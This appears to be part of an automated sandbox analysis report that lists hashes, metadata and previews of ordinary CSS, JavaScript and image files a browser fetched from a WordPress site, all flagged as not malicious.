                                                                                                          Category:downloaded
                                                                                                          Size (bytes):28486
                                                                                                          Entropy (8bit):6.0827502349938065
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:q3be4VfrRtzY4WsOMVUNGEe2f+vdcqpW6F4CkHCJ95H2Aa23EkxqthJfSqnZ:qnVDzc4b5xC2PGC3QAaCEUiJ1Z
                                                                                                          MD5:DDC6D4588CBB41ECB18AD26C232547D1
                                                                                                          SHA1:919F45F845BA95B8971E9F7771B4214D3936B600
                                                                                                          SHA-256:E2192D14732DDCF8E8FD4BD7FD44AC69805F3CEAF6A8DE5948BEADCC232A4020
                                                                                                          SHA-512:FCB10335670197B60A42AE2CC0B774273020C0A6FFB2753B55D7F374ED1E1D1EC7C55DB07BDCE733387C16A9DE627B936EBA7F253D7E912285BC7D085D985EA1
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/show-hidecollapse-expand/assets/css/genericons/genericons.css?ver=6.7.1
                                                                                                          Preview:/**...Genericons..*/.../* IE8 and below use EOT and allow cross-site embedding. . IE9 uses WOFF which is base64 encoded to allow cross-site embedding.. So unfortunately, IE9 will throw a console error, but it'll still work.. When the font is base64 encoded, cross-site embedding works in Firefox */.@font-face {. font-family: "Genericons";. src: url("./Genericons.eot?") format("embedded-opentype");. font-weight: normal;. font-style: normal;.}..@font-face {. font-family: "Genericons";. src: url("data:application/x-font-woff;charset=utf-8;base64,d09GRgABAAAAADdgAA0AAAAAV4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGRlRNAAA3RAAAABsAAAAce83cqk9TLzIAAAGgAAAARQAAAGBkLHXFY21hcAAAAogAAACWAAABsqlys6FjdnQgAAADIAAAAAQAAAAEAEQFEWdhc3AAADc8AAAACAAAAAj//wADZ2x5ZgAABFQAAC95AABJYOgXX9doZWFkAAABMAAAADAAAAA2D77/XmhoZWEAAAFgAAAAHQAAACQQuAgGaG10eAAAAegAAACfAAABOFjwU3Jsb2NhAAADJAAAATAAAAEw5FP2dm1heHAAAAGAAAAAIAAAACAA6QEZbmFtZQAAM9AAAAE8AAACOjHf71xwb3N0AAA1DAAAAjAAAAXo9iKXv3jaY2BkYGAA4sUzNS/F89t8ZeDmYACBKwE3
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):7764
                                                                                                          Entropy (8bit):7.9677103680538695
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:5tSKPPNCiRyzOv11OHRbpEdRHk4XKkkE5n:bSYlhRyzOvjiFQRHl6kkQ
                                                                                                          MD5:43A7D0183A8558E82488856F412A421D
                                                                                                          SHA1:CFA8EF747AF26F31FB8568E34846830912CA9FF3
                                                                                                          SHA-256:36652D77CF955261B3CB4B12A161173791F79932763BF44E8D5405CDBCEFAE58
                                                                                                          SHA-512:96A3456F0CBC7CDF81F064F729954D02A205374DB26AC00775C8D4C30EC94985A507812D6D31154A3E9AC1785DC7B9B75722B8FB1E806CD70C05C99DE809EF0F
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://use.fontawesome.com/releases/v5.0.0/css/all.css
                                                                                                          Preview:(./..X=...#./-.LF...C.k...G.U.."J..v..O...W-CC+{,..8....(.....02.g.3.i.d:#.(.#......9......[3.....!.A..8.g.G.g.Y....8(.A.of.[.....-..(Yi.-..I..J..m.B..i.<).W...Y...$.dE....A.U..~J\.......[l../,.V..._>....J.g....e........,T ...tV..uLT.m?W.B(..P.......N.....`._.R.}.9.[[P.*.*:k.o.....`Dr.8...it.....".98..`.?g.<.... ....t .(. ......t*...u.... H. ..d.<...aA.yK.;....~..T")PR...H......0P......`ea..H..../.0..kg&4.ga.:C..<._)r..!... `......4.'a...p...P...).N...c....b.f*....[N3......u....,J.....%.W%2........Y....fV....,@V..#./..K...>.k. '...M..3.7..2...^=J..V"@>...:~&....8zd..P3.%.........g..%<.9h.P(....pH..RB...sB '..c0...[.5}v @>$...RJ....t...:..... 8..Pb?..o(.).....=2.E(B..[.c...>9.!4..o...X.0......Pb/..NC.;..n.84.s.A..3(x....:..u...,PH ...X@....PP.......PP@..(0..cH..8@...(0ft....`Ff.......3...I.R0K....".p..p(0?...>.a....@a.B..X`A..t.;n.yN..0[w8..!..i.F.g..g.aVi...3R..Y...O...c.f%.. ..+....=......b%7.Od.ZBV)Y09..).=>|.qR..B}......m..o../.....@k5b..u..t.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):28
                                                                                                          Entropy (8bit):4.066108939837481
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:GMyoSt:jFSt
                                                                                                          MD5:96B191AE794C2C78387B3F4F9BB7A251
                                                                                                          SHA1:F974547DF0ADFFB7E80699552C6BCE3E709343A6
                                                                                                          SHA-256:CE76758AEEF2CAF12021AFB5257D0CA4E9E5C20015C2C85D68BB27FA6B1AFB28
                                                                                                          SHA-512:07EE1CFDBD53C1046FA4F44FF7C83F4456CDAA099299816B451D114E3EEAAD4BE8F0CD0FC09F0E838418BCBB5E50547E806E8E080B8E3421D0DB26FF4C15D412
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTMxLjAuNjc3OC4xMDkSIAlcpb32yDfoPRIFDeeNQA4SBQ3OQUx6IWjz1kw5SXp1?alt=proto
                                                                                                          Preview:ChIKBw3njUAOGgAKBw3OQUx6GgA=
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:GIF image data, version 89a, 24 x 24
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2545
                                                                                                          Entropy (8bit):7.144078312196678
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:HKJqZ5vxZv9ud9c5674XCj1MWBXqSP6kn6daLzvBEKP:HwYJIdGU74yj1RXq9k6dafv+
                                                                                                          MD5:4B3AFB84B2B71EF56DF09997A350BD04
                                                                                                          SHA1:ACCDAC8A7ABEAB0E21C49539AAD0A973ADDB28EF
                                                                                                          SHA-256:9034D5D34015E4B05D2C1D1A8DC9F6EC9D59BD96D305EB9E24E24E65C591A645
                                                                                                          SHA-512:D65078B5D13873ADB363472B5C358F6B42C128B530F8FEBA9776F8E4906CC97F20EE7BF1E823336CDA8049147A9C7FA5E4016F07F96EC154F3774FBDE1A564B6
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:GIF89a...........................................vvv......hhh..........................................!..Created with ajaxload.info.!.......!..NETSCAPE2.0.....,........... .$.AeZ...<...Q46.<...A.......H.a....:....ID0.F...a\xG.3...!...O:-....Rj...TJ..*........t...........~."...ds]......)t...-"...i;H>.n.Qg]_*......R.3.....GI?.....v$...j3!.!.......,........... .$.0eZ..y..0..q ..P..W...)";..qX.^..D50......<H3.!.....k-.n..a. .(.i...d.$P@y.w`.J..#.....?..y........o...g.....f....'8..{..'C.p`j.n."...2.{.`x...jy.4...C,.4..o#n.$.....!.!.......,........... .$. eZ...$.2.....q....E. ....p$H@D/.....G.D.j8v#..P((D..... ..N.(3..#.y....(@...gUx*.kK.).....?K...............$..."....*.......K.....W......x..?.G...#.W....n.h.K,.....+.....*!.!.......,........... .$ .eZ..Y.$1..Q(c......O'"............. 1....q.d"..A.....V.x8p..4988.MRC.@....e*.3@.iI.)..'.?I.........@.......,.....#.........5..,.....".E..z...?..@.E...@.....).....*!.!.......,........... .$.(e..$....C.E1..;...('2$..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (43353)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):43392
                                                                                                          Entropy (8bit):5.408544605819908
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:0TOcp4IW+3ExKTnyHLhdsD5ORvdqKqN+JeVyTUpX68POMIe7wwHXXYB53r6Oikzv:06cp4IOxKTyHLwDcRvdMNUeVyQpX682/
                                                                                                          MD5:F047DF9A35C9DB95B0BB24A98A863892
                                                                                                          SHA1:A22FD5F8D8D749CB217E34212668637687B193F1
                                                                                                          SHA-256:7CE5EBAA76613684B5EBF327FE920F0AC2F7577E8F816E02F108B2B144B3E316
                                                                                                          SHA-512:189BE8D714AD2473E791B2B94AE8636BECAF3349565095ED705694745D22ADD4EB1C002E123C6DE3633F76E900F4EBD57F0AD82F2130611EC38CB1AF64A30376
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.6.1
                                                                                                          Preview:/*! elementor - v3.6.1 - 23-03-2022 */.(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[882,723,209,745,120,192,520,181,791,268,357],{5526:e=>{e.exports=function _defineProperty(e,t,s){return t in e?Object.defineProperty(e,t,{value:s,enumerable:!0,configurable:!0,writable:!0}):e[t]=s,e},e.exports.default=e.exports,e.exports.__esModule=!0},8470:(e,t,s)=>{"use strict";var n=s(7914);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var i=n(s(9728));class Accordion extends i.default{getDefaultSettings(){return{...super.getDefaultSettings(),showTabFn:"slideDown",hideTabFn:"slideUp"}}}t.default=Accordion},9269:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class Alert extends elementorModules.frontend.handlers.Base{getDefaultSettings(){return{selectors:{dismissButton:".elementor-alert-dismiss"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$dismissButton:this.$element.find(e.dismissButton)}}bindEve
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):3545
                                                                                                          Entropy (8bit):4.544468898754614
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:dS5gRBcJNf19dYdyIxcmCXmT8w+p+xgMzf:M5gRBcJNf19dYdyIxcmNT87p+xgML
                                                                                                          MD5:7765D912B815D023405044D5A67932C7
                                                                                                          SHA1:99BB63A7C3BA0BEF83D0D60A0AC5E22FA7543F45
                                                                                                          SHA-256:EA27ADEFE5FFB2B2306D13DC337D3CDC23031D2816EFA3FA7B4F06A4377EED9D
                                                                                                          SHA-512:8DF08B3460C18F7761188121B37587C4490E2CAA9D1E1285775548A24EB92083655B534B1A1EFA879FCFD8014E980FC351839DF529A363A744547C5401EB768D
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/image/js/html_types/image.js?ver=3.3.0
                                                                                                          Preview:"use strict";.function woof_init_image() {. //http://jsfiddle.net/jtbowden/xP2Ns/. jQuery('.woof_image_term').each(function () {. var image = jQuery(this).data('image');. var styles = jQuery(this).data('styles');. if (image.length > 0) {. styles += '; background-image: url(' + image + '); ';. } else {. styles += '; background-color: #ffffff;';. }.. var span = jQuery('<span style="' + styles + '" class="' + jQuery(this).attr('type') + ' ' + jQuery(this).attr('class') + '" title=""></span>').on('click',woof_image_do_check).mousedown(woof_image_do_down).mouseup(woof_image_do_up);. if (jQuery(this).is(':checked')) {. span.addClass('checked');. }. jQuery(this).wrap(span).hide();. jQuery(this).after('<span class="woof_image_checked"></span>');//for checking. });.. function woof_image_do_check() {. var is_checked = false;. var radio=false;. if(jQuery(this).pa
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (18843)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):18878
                                                                                                          Entropy (8bit):5.200208004249851
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:u2Rq5yjN1V02mEHrJDzWp3D0bMpOt3PPD71ijeE9OWj:LqIbV0sHG3D0dD71Uj
                                                                                                          MD5:16699A7F2AEBE8D676042962C3BB5537
                                                                                                          SHA1:9697E3FE2D92C79DEBD82478603D4B59FC249714
                                                                                                          SHA-256:5152316FADE8C592FBFD38BC491E059464D967D3D31A582B0C885C0961DEED30
                                                                                                          SHA-512:49AE27B783F99B50A7FE43F084554EDBC87E430982C736C425FDFC26D1550C19B28C6127D3C8A730A31317ADF90008CFE5DBDDD27ECC6E1096D5520704ED8621
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-includes/js/underscore.min.js?ver=1.13.7
                                                                                                          Preview:/*! This file is auto-generated */.!function(n,t){var r,e;"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define("underscore",t):(n="undefined"!=typeof globalThis?globalThis:n||self,r=n._,(e=n._=t()).noConflict=function(){return n._=r,e})}(this,function(){var n="1.13.7",t="object"==typeof self&&self.self===self&&self||"object"==typeof global&&global.global===global&&global||Function("return this")()||{},e=Array.prototype,V=Object.prototype,F="undefined"!=typeof Symbol?Symbol.prototype:null,P=e.push,f=e.slice,s=V.toString,q=V.hasOwnProperty,r="undefined"!=typeof ArrayBuffer,u="undefined"!=typeof DataView,U=Array.isArray,W=Object.keys,z=Object.create,L=r&&ArrayBuffer.isView,$=isNaN,C=isFinite,K=!{toString:null}.propertyIsEnumerable("toString"),J=["valueOf","isPrototypeOf","toString","propertyIsEnumerable","hasOwnProperty","toLocaleString"],G=Math.pow(2,53)-1;function l(u,o){return o=null==o?u.length-1:+o,function(){for(var n=M
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 513x330, components 3
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):42000
                                                                                                          Entropy (8bit):7.981674651059325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:b45AwXhkVsYz1N93ni5DzR+B7aOtBYUzlXvoqMdX4vkPjnn0Cq7HC8/Owk:b4ywXhkVsYz9nWm70UZXAfdXekPr0ZCD
                                                                                                          MD5:85E20AC73DFE7B8248DA60D0A28A788D
                                                                                                          SHA1:41E18A3DFD153AF842E2D7BEF71577CD91C2A70D
                                                                                                          SHA-256:251EDA10E6C17E0CE42B1AB05794B4A05045B184BC9B4FB843D71989A88A232B
                                                                                                          SHA-512:1EF6187E9DA483B0993DC517009F1ADF1EB13F023C06453F774356037F58B8EB523587C7906C7BCEDF5EA48752A552AA31899FF70BF943EB47EB573C5B361832
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/2022/10/Home-3-1.jpg
                                                                                                          Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......J...."..............................................................................M.a..0/..%.aY......+.:.Y...!+:.)G.(.F............e.e.+0Dc....p.N....>V...".D.}PxS....[.[.N.X.p..>s.,.I;..cZ....._G..z.Z.F_...e4.M....1J.f...j_..e...1hhu...D.<.......T....[..q...n.:.)....`........6.XL..W.>.<...u.Fq...*.._.W...c.".)S{.f.......}.vPK....7u7=..K...T.Q..h.\T.6....J..E......EL..(Mpk....`.....JZ....c..%6<j...j8......w.z.'.Cl...f.......:.,.9....C..T...).H.|...rye..hr-.Q.,?.........0..6..:....W5..k..lk<.{,....A......{...,..g....E..\._i..O.N.P.]S..S..F.(@.KC..I.G..@?U.ii. .b...).0._p.it..$.p.5L1..=gK..s..d...7t...[...j{.x....'.....B.W....5. ...I.2.|...>].P.)..F.......O,...G.<Y.b...$.;3j...N...g..i.t{..#...............N_.....z...u.k.[...o;....&..s..z..|.S.OF........b.Sh....pEO.{r...W0.).....~.U?
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (9251)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):244801
                                                                                                          Entropy (8bit):5.453841413977933
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:/FLeYH8SRWJ/37OeR8NteqZEbkxZNsucrl0xYurPK713cCq:/FLeYcYWJzH8NNfFcrHurPK713Rq
                                                                                                          MD5:C9C37DBE6B077A4AAEEEA29AF4857656
                                                                                                          SHA1:E9A790D720E436BA047D67C4D441E840D660433D
                                                                                                          SHA-256:C4EB49795F7A703429E7012CEC0A556E6FAF6F551F07CD337F66C5A1EC3A5847
                                                                                                          SHA-512:660F8CD397BAFA6D8F44BA4C2CD066AAF934A69B5E608D6CE63636240E339ACFF93AE9B72F6B01C4E29BF9C89B11A73C2D5D3F36EFEAD5194D138B38F7E0DFA4
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://connect.facebook.net/en_US/fbevents.js
                                                                                                          Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with very long lines (13054), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):13054
                                                                                                          Entropy (8bit):5.177767631277299
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:I/Igki2JjSTXMpzZJ3eY+3kY+H6cqv8s+pfYm03pYToAAA:I/IgNwjSTXMpeY+3kY0dqv8s+pfYm03M
                                                                                                          MD5:917602D642F84A211838F0C1757C4DC1
                                                                                                          SHA1:392DF3FB4B0EC96CE4EBB5616E6B2A5C55A54BF8
                                                                                                          SHA-256:D702E5ED1E573918D912775AC1E88987FC177AA51EFE1253A08F71AB54F96516
                                                                                                          SHA-512:92AFC44A2405434F119E8E57732E232CDFADBDBA1948D3E89EAB596282119D14CF9707F36037B22C9DD6F3104AADECC28B9301D044842D60DD43CEA98DDBC929
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.9.6
                                                                                                          Preview:(()=>{"use strict";const e=e=>Math.abs(parseInt(e,10)),t=(e,t,a)=>{const n=new CustomEvent(`wpcf7${t}`,{bubbles:!0,detail:a});"string"==typeof e&&(e=document.querySelector(e)),e.dispatchEvent(n)},a=(e,a)=>{const n=new Map([["init","init"],["validation_failed","invalid"],["acceptance_missing","unaccepted"],["spam","spam"],["aborted","aborted"],["mail_sent","sent"],["mail_failed","failed"],["submitting","submitting"],["resetting","resetting"],["validating","validating"],["payment_required","payment-required"]]);n.has(a)&&(a=n.get(a)),Array.from(n.values()).includes(a)||(a=`custom-${a=(a=a.replace(/[^0-9a-z]+/i," ").trim()).replace(/\s+/,"-")}`);const r=e.getAttribute("data-status");if(e.wpcf7.status=a,e.setAttribute("data-status",a),e.classList.add(a),r&&r!==a){e.classList.remove(r);const a={contactFormId:e.wpcf7.id,pluginVersion:e.wpcf7.pluginVersion,contactFormLocale:e.wpcf7.locale,unitTag:e.wpcf7.unitTag,containerPostId:e.wpcf7.containerPost,status:e.wpcf7.status,prevStatus:r};t(e,"st
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                          Category:dropped
                                                                                                          Size (bytes):43
                                                                                                          Entropy (8bit):2.7374910194847146
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:CU9yltxlHh/:m/
                                                                                                          MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                          SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                          SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                          SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:GIF89a.............!.......,...........D..;
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1823
                                                                                                          Entropy (8bit):4.532101813350908
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:7TK3s1SKiU3s89K/wLbdParPYtiHLb2iyT3P7wkUwp+x1X0Ef:q3iSKb3R9K/wFqtKp+xZ0Ef
                                                                                                          MD5:2DC80B6309B74087CCB664826A61BFB0
                                                                                                          SHA1:4346E25D252B40BE817FC1CB2214FB147E148E6C
                                                                                                          SHA-256:FC9696AC68E0C65FDB2AD0C19AECD8ADA9DB29176ADD61BC840C48328797C884
                                                                                                          SHA-512:F07EEF7C6D9900C1D0DAADD50E356ECD11B4BFD46CA84AAF8A9369BCD0DEF6C76ACAAE1582E47EA63B517856916B42C017E6DCE266DC7775FC808ABCFB302F8C
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:"use strict";.function woof_init_labels() {. jQuery('.woof_label_term').on('click', function () {.. var checkbox = jQuery(this).find('input.woof_label_term').eq(0);.. if (jQuery(checkbox).is(':checked')) {. jQuery(checkbox).attr("checked", false);. jQuery(this).removeClass("checked");. woof_label_process_data(checkbox, false);. } else {. jQuery(checkbox).attr("checked", true);. jQuery(this).addClass("checked");. woof_label_process_data(checkbox, true);. }. });.}.function woof_label_process_data(_this, is_checked) {. var tax = jQuery(_this).data('tax');. var name = jQuery(_this).attr('name');. var term_id = jQuery(_this).data('term-id');. woof_label_direct_search(term_id, name, tax, is_checked);.}.function woof_label_direct_search(term_id, name, tax, is_checked) {. var values = '';. var checked = true;. if (is_checked) {. if (tax in woof_current_values) {.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10995
                                                                                                          Entropy (8bit):4.581601992681243
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:GYKhIuNCCpoRZJetq1lThgrJWm8YNJQks67b9lk7fxjaZDrIdav2npzaI2Sx02a3:G5muYI8dBn7xfXn7PnQVH+P1Cr
                                                                                                          MD5:5652F964FCB8A64A72D04590F2DCD9C1
                                                                                                          SHA1:DC61EA2516740E7511DA87F09BC22D7D3139CFCF
                                                                                                          SHA-256:8D2E4FDC471ECD2DB90102043B89011DB498A5FABE785FCF887B14EF05377428
                                                                                                          SHA-512:A94D5D5B48F72D8EB1CB2A1BBA0E8C785C141332B1CDADB6338F10B6B942C34D47D0CA6818236BFD286E3E7FB9CB5A44280F8362492F784561B14CB14FA9876A
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*!. * headroom.js v0.11.0 - Give your page some headroom. Hide your header until you need it. * Copyright (c) 2020 Nick Williams - http://wicky.nillia.ms/headroom.js. * License: MIT. */..(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? module.exports = factory() :. typeof define === 'function' && define.amd ? define(factory) :. (global = global || self, global.Headroom = factory());.}(this, function () { 'use strict';.. function isBrowser() {. return typeof window !== "undefined";. }.. /**. * Used to detect browser support for adding an event listener with options. * Credit: https://developer.mozilla.org/en-US/docs/Web/API/EventTarget/addEventListener. */. function passiveEventsSupported() {. var supported = false;.. try {. var options = {. // eslint-disable-next-line getter-return. get passive() {. supported = true;. }. };. window.addEventListener("test", options, options);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (1391)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1426
                                                                                                          Entropy (8bit):5.2713128211306
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:Q77Beacy8766a2IFav3gRR46UUU6DXEhL38AX34jPrgwXopq17hgn:Q7DHH2IuggP6DXEF36oo8
                                                                                                          MD5:19D386C9004E54941C1CC61D357EFA5D
                                                                                                          SHA1:0A77594006C8D86FDCC0ADBC2B9AECAEF3869586
                                                                                                          SHA-256:3BC6467A95CEC8FA516C6F5F69E1301E37E16F9BB1046FE7756729249F901B95
                                                                                                          SHA-512:7811CF6BABB4DF41707F97D1BD65337B5AD7AAEDFF301FCEDB90FB7773FA9876F52458AA03A576910F6126384599EF25F8DE76EE309C22E1914D9CF444AEFB6F
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*! This file is auto-generated */.window.wp=window.wp||{},function(s){var t="undefined"==typeof _wpUtilSettings?{}:_wpUtilSettings;wp.template=_.memoize(function(e){var n,a={evaluate:/<#([\s\S]+?)#>/g,interpolate:/\{\{\{([\s\S]+?)\}\}\}/g,escape:/\{\{([^\}]+?)\}\}(?!\})/g,variable:"data"};return function(t){if(document.getElementById("tmpl-"+e))return(n=n||_.template(s("#tmpl-"+e).html(),a))(t);throw new Error("Template not found: #tmpl-"+e)}}),wp.ajax={settings:t.ajax||{},post:function(t,e){return wp.ajax.send({data:_.isObject(t)?t:_.extend(e||{},{action:t})})},send:function(a,t){var e,n;return _.isObject(a)?t=a:(t=t||{}).data=_.extend(t.data||{},{action:a}),t=_.defaults(t||{},{type:"POST",url:wp.ajax.settings.url,context:this}),(e=(n=s.Deferred(function(n){t.success&&n.done(t.success),t.error&&n.fail(t.error),delete t.success,delete t.error,n.jqXHR=s.ajax(t).done(function(t){var e;"1"!==t&&1!==t||(t={success:!0}),_.isObject(t)&&!_.isUndefined(t.success)?(e=this,n.done(function(){a&&
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):10995
                                                                                                          Entropy (8bit):4.581601992681243
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:GYKhIuNCCpoRZJetq1lThgrJWm8YNJQks67b9lk7fxjaZDrIdav2npzaI2Sx02a3:G5muYI8dBn7xfXn7PnQVH+P1Cr
                                                                                                          MD5:5652F964FCB8A64A72D04590F2DCD9C1
                                                                                                          SHA1:DC61EA2516740E7511DA87F09BC22D7D3139CFCF
                                                                                                          SHA-256:8D2E4FDC471ECD2DB90102043B89011DB498A5FABE785FCF887B14EF05377428
                                                                                                          SHA-512:A94D5D5B48F72D8EB1CB2A1BBA0E8C785C141332B1CDADB6338F10B6B942C34D47D0CA6818236BFD286E3E7FB9CB5A44280F8362492F784561B14CB14FA9876A
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/themes/ciena/assets/js/headroom.js?ver=0.11.0
                                                                                                          Preview:/*!. * headroom.js v0.11.0 - Give your page some headroom. Hide your header until you need it. * Copyright (c) 2020 Nick Williams - http://wicky.nillia.ms/headroom.js. * License: MIT. */..(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? module.exports = factory() :. typeof define === 'function' && define.amd ? define(factory) :. (global = global || self, global.Headroom = factory());.}(this, function () { 'use strict';.. function isBrowser() {. return typeof window !== "undefined";. }.. /**. * Used to detect browser support for adding an event listener with options. * Credit: https://developer.mozilla.org/en-US/docs/Web/API/EventTarget/addEventListener. */. function passiveEventsSupported() {. var supported = false;.. try {. var options = {. // eslint-disable-next-line getter-return. get passive() {. supported = true;. }. };. window.addEventListener("test", options, options);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (16050), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16050
                                                                                                          Entropy (8bit):5.288065661034305
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:OYhYqYReYYzlYbI7B5+zTmVQ9nZmg99c9o2ex4bxRehhhYPpoxTQxIPP9m:OYhYqYReYklHd5mTIQ9njG9bbCOafo
                                                                                                          MD5:C480693CDE41218F9DF213280ED0EC8F
                                                                                                          SHA1:63763B3757A54503D5D04FA2D9C67396BA47AD64
                                                                                                          SHA-256:682B309B932A8D2B8D288D972F4BFA379CC761E64B7A633CA3CD7E10D56AD5B0
                                                                                                          SHA-512:1D37C2D59B010B9557B85084DBA3C685DD5B779CA9F14CE1C25E7E9E55711D02C21710690B2272D06741D497037E52CB6E49CF3867BCF21503CB774A60EB981F
                                                                                                          Malicious:false
                                                                                                          Reputation:low
